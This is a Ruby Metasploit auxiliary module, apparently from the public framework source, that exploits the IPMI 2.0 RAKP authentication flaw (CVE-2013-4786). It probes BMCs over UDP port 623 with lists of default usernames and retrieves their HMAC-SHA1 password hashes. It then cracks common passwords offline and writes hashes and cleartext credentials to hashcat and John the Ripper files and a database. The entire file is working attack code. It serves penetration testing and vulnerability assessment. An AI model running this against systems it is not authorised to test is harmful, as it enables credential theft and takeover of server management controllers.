1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Auxiliary::Report
8
  include Msf::Auxiliary::Scanner
9

10
  def initialize
11
    super(
12
      'Name' => 'IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval',
13
      'Description' => %q|
14
        This module identifies IPMI 2.0-compatible systems and attempts to retrieve the
15
        HMAC-SHA1 password hashes of default usernames. The hashes can be stored in a
16
        file using the OUTPUT_FILE option and then cracked using hmac_sha1_crack.rb
17
        in the tools subdirectory as well hashcat (cpu) 0.46 or newer using type 7300.
18
        |,
19
      'Author' => [ 'Dan Farmer <zen[at]fish2.com>', 'hdm' ],
20
      'License' => MSF_LICENSE,
21
      'References' => [
22
        ['URL', 'http://fish2.com/ipmi/remote-pw-cracking.html'],
23
        ['URL', 'https://seclists.org/bugtraq/2014/Apr/16'], # HP's SSRT101367
24
        ['CVE', '2013-4786'],
25
        ['OSVDB', '95057'],
26
        ['BID', '61076'],
27
      ],
28
      'DisclosureDate' => 'Jun 20 2013'
29
    )
30

31
    register_options(
32
      [
33
        Opt::RPORT(623),
34
        OptPath.new('USER_FILE', [
35
          true, "File containing usernames, one per line",
36
          File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_users.txt')
37
        ]),
38
        OptPath.new('PASS_FILE', [
39
          true, "File containing common passwords for offline cracking, one per line",
40
          File.join(Msf::Config.install_root, 'data', 'wordlists', 'ipmi_passwords.txt')
41
        ]),
42
        OptString.new('OUTPUT_HASHCAT_FILE', [false, "Save captured password hashes in hashcat format"]),
43
        OptString.new('OUTPUT_JOHN_FILE', [false, "Save captured password hashes in john the ripper format"]),
44
        OptBool.new('CRACK_COMMON', [true, "Automatically crack common passwords as they are obtained", true]),
45
        OptInt.new('SESSION_RETRY_DELAY', [true, "Delay between session retries in seconds", 5]),
46
        OptInt.new('SESSION_MAX_ATTEMPTS', [true, "Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)", 5])
47
      ]
48
    )
49
  end
50

51
  def post_auth?
52
    true
53
  end
54

55
  def ipmi_status(msg)
56
    vprint_status("#{rhost}:#{rport} - IPMI - #{msg}")
57
  end
58

59
  def ipmi_error(msg)
60
    vprint_error("#{rhost}:#{rport} - IPMI - #{msg}")
61
  end
62

63
  def ipmi_good(msg)
64
    print_good("#{rhost}:#{rport} - IPMI - #{msg}")
65
  end
66

67
  def run_host(ip)
68
    ipmi_status("Sending IPMI probes")
69

70
    usernames = []
71
    passwords = []
72

73
    # Load up our username list (save on open fds)
74
    ::File.open(datastore['USER_FILE'], "rb") do |fd|
75
      fd.each_line do |line|
76
        usernames << line.strip
77
      end
78
    end
79
    usernames << ""
80
    usernames = usernames.uniq
81

82
    # Load up our password list (save on open fds)
83
    ::File.open(datastore['PASS_FILE'], "rb") do |fd|
84
      fd.each_line do |line|
85
        passwords << line.gsub(/\r?\n?/, '')
86
      end
87
    end
88
    passwords << ""
89
    passwords = passwords.uniq
90

91
    delay_value = datastore['SESSION_RETRY_DELAY'].to_i
92
    max_session_attempts = datastore['SESSION_MAX_ATTEMPTS'].to_i
93

94
    self.udp_sock = Rex::Socket::Udp.create({ 'Context' => { 'Msf' => framework, 'MsfExploit' => self } })
95
    add_socket(self.udp_sock)
96

97
    reported_vuln = false
98
    session_succeeded = false
99

100
    usernames.each do |username|
101
      console_session_id = Rex::Text.rand_text(4)
102
      console_random_id = Rex::Text.rand_text(16)
103

104
      ipmi_status("Trying username '#{username}'...")
105

106
      rakp = nil
107
      sess = nil
108
      sess_data = nil
109

110
      # It may take multiple tries to get a working "session" on certain BMCs (HP iLO 4, etc)
111
      1.upto(max_session_attempts) do |attempt|
112
        r = nil
113
        1.upto(3) do
114
          udp_send(Rex::Proto::IPMI::Utils.create_ipmi_session_open_request(console_session_id))
115
          r = udp_recv(5.0)
116
          break if r
117
        end
118

119
        unless r
120
          ipmi_status("No response to IPMI open session request")
121
          rakp = nil
122
          break
123
        end
124

125
        sess = process_opensession_reply(*r)
126
        unless sess
127
          ipmi_status("Could not understand the response to the open session request")
128
          rakp = nil
129
          break
130
        end
131

132
        if sess.data.length < 8
133
          ipmi_status("Refused IPMI open session request, waiting #{delay_value} seconds")
134
          rakp = nil
135
          sleep(delay_value) if session_succeeded
136
          next # break
137
        end
138

139
        session_succeeded = true
140

141
        sess_data = Rex::Proto::IPMI::Session_Data.new.read(sess.data)
142

143
        r = nil
144
        1.upto(3) do
145
          udp_send(Rex::Proto::IPMI::Utils.create_ipmi_rakp_1(sess_data.bmc_session_id, console_random_id, username))
146
          r = udp_recv(5.0)
147
          break if r
148
        end
149

150
        unless r
151
          ipmi_status("No response to RAKP1 message")
152
          next
153
        end
154

155
        rakp = process_rakp1_reply(*r)
156
        unless rakp
157
          ipmi_status("Could not understand the response to the RAKP1 request")
158
          rakp = nil
159
          break
160
        end
161

162
        # Sleep and retry on session ID errors
163
        if rakp.error_code == 2
164
          ipmi_error("Returned a Session ID error for username #{username} on attempt #{attempt}")
165
          Rex.sleep(1)
166
          next
167
        end
168

169
        if rakp.error_code != 0
170
          ipmi_error("Returned error code #{rakp.error_code} for username #{username}: #{Rex::Proto::IPMI::RMCP_ERRORS[rakp.error_code].to_s}")
171
          rakp = nil
172
          break
173
        end
174

175
        # TODO: Finish documenting this error field
176
        if rakp.ignored1 != 0
177
          ipmi_error("Returned error code #{rakp.ignored1} for username #{username}")
178
          rakp = nil
179
          break
180
        end
181

182
        # Check if there is hash data
183
        if rakp.data.length < 56
184
          rakp = nil
185
          break
186
        end
187

188
        # Break out of the session retry code if we make it here
189
        break
190
      end
191

192
      # Skip to the next user if we didnt get a valid response
193
      next if !rakp
194

195
      # Calculate the salt used in the hmac-sha1 hash
196
      rakp_data = Rex::Proto::IPMI::RAKP2_Data.new.read(rakp.data)
197
      hmac_buffer = Rex::Proto::IPMI::Utils.create_rakp_hmac_sha1_salt(
198
        console_session_id,
199
        sess_data.bmc_session_id,
200
        console_random_id,
201
        rakp_data.bmc_random_id,
202
        rakp_data.bmc_guid,
203
        0x14,
204
        username
205
      )
206

207
      sha1_salt = hmac_buffer.unpack("H*")[0]
208
      sha1_hash = rakp_data.hmac_sha1.unpack("H*")[0]
209

210
      if sha1_hash == "0000000000000000000000000000000000000000"
211
        ipmi_error("Returned a bogus SHA1 hash for username #{username}")
212
        next
213
      end
214

215
      ipmi_good("Hash found: #{username}:#{sha1_salt}:#{sha1_hash}")
216

217
      write_output_files(rhost, username, sha1_salt, sha1_hash)
218

219
      # Write the rakp hash to the database
220
      hash = "#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}"
221
      core_id = report_hash(username, hash)
222
      # Write the vulnerability to the database
223
      unless reported_vuln
224
        report_vuln(
225
          :host => rhost,
226
          :port => rport,
227
          :proto => 'udp',
228
          :sname => 'ipmi',
229
          :name => 'IPMI 2.0 RMCP+ Authentication Password Hash Exposure',
230
          :info => "Obtained password hash for user #{username}: #{sha1_salt}:#{sha1_hash}",
231
          :refs => self.references
232
        )
233
        reported_vuln = true
234
      end
235

236
      # Offline crack common passwords and report clear-text credentials
237
      next unless datastore['CRACK_COMMON']
238

239
      passwords.uniq.each do |pass|
240
        pass = pass.strip
241
        next unless pass.length > 0
242
        next unless Rex::Proto::IPMI::Utils.verify_rakp_hmac_sha1(hmac_buffer, rakp_data.hmac_sha1, pass)
243

244
        ipmi_good("Hash for user '#{username}' matches password '#{pass}'")
245

246
        # Report the clear-text credential to the database
247
        report_cracked_cred(username, pass, core_id)
248
        break
249
      end
250
    end
251
  end
252

253
  def process_opensession_reply(data, shost, sport)
254
    shost = shost.sub(/^::ffff:/, '')
255
    info = Rex::Proto::IPMI::Open_Session_Reply.new.read(data) rescue nil
256
    return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RMCPPLUSOPEN_REP
257

258
    info
259
  end
260

261
  def process_rakp1_reply(data, shost, sport)
262
    shost = shost.sub(/^::ffff:/, '')
263
    info = Rex::Proto::IPMI::RAKP2.new.read(data) rescue nil
264
    return unless info && info.session_payload_type == Rex::Proto::IPMI::PAYLOAD_RAKP2
265

266
    info
267
  end
268

269
  def write_output_files(rhost, username, sha1_salt, sha1_hash)
270
    if datastore['OUTPUT_HASHCAT_FILE']
271
      ::File.open(datastore['OUTPUT_HASHCAT_FILE'], "ab") do |fd|
272
        fd.write("#{rhost} #{username}:#{sha1_salt}:#{sha1_hash}\n")
273
        fd.flush
274
      end
275
    end
276

277
    if datastore['OUTPUT_JOHN_FILE']
278
      ::File.open(datastore['OUTPUT_JOHN_FILE'], "ab") do |fd|
279
        fd.write("#{rhost} #{username}:$rakp$#{sha1_salt}$#{sha1_hash}\n")
280
        fd.flush
281
      end
282
    end
283
  end
284

285
  def service_data
286
    {
287
      address: rhost,
288
      port: rport,
289
      service_name: 'ipmi',
290
      protocol: 'udp',
291
      workspace_id: myworkspace_id
292
    }
293
  end
294

295
  def report_hash(user, hash)
296
    credential_data = {
297
      module_fullname: self.fullname,
298
      origin_type: :service,
299
      private_data: hash,
300
      private_type: :nonreplayable_hash,
301
      jtr_format: 'rakp',
302
      username: user,
303
    }.merge(service_data)
304

305
    login_data = {
306
      core: create_credential(credential_data),
307
      status: Metasploit::Model::Login::Status::UNTRIED
308
    }.merge(service_data)
309

310
    cl = create_credential_login(login_data)
311
    cl ? cl.core_id : nil
312
  end
313

314
  def report_cracked_cred(user, password, core_id)
315
    cred_data = {
316
      core_id: core_id,
317
      username: user,
318
      password: password
319
    }
320

321
    create_cracked_credential(cred_data)
322
  end
323

324
  #
325
  # Helper methods (these didn't quite fit with existing mixins)
326
  #
327

328
  attr_accessor :udp_sock
329

330
  def udp_send(data)
331
    begin
332
      udp_sock.sendto(data, rhost, datastore['RPORT'], 0)
333
    rescue ::Interrupt
334
      raise $!
335
    rescue ::Exception
336
    end
337
  end
338

339
  def udp_recv(timeo)
340
    r = udp_sock.recvfrom(65535, timeo)
341
    r[1] ? r : nil
342
  end
343

344
  def rhost
345
    datastore['RHOST']
346
  end
347

348
  def rport
349
    datastore['RPORT']
350
  end
351
end
352

353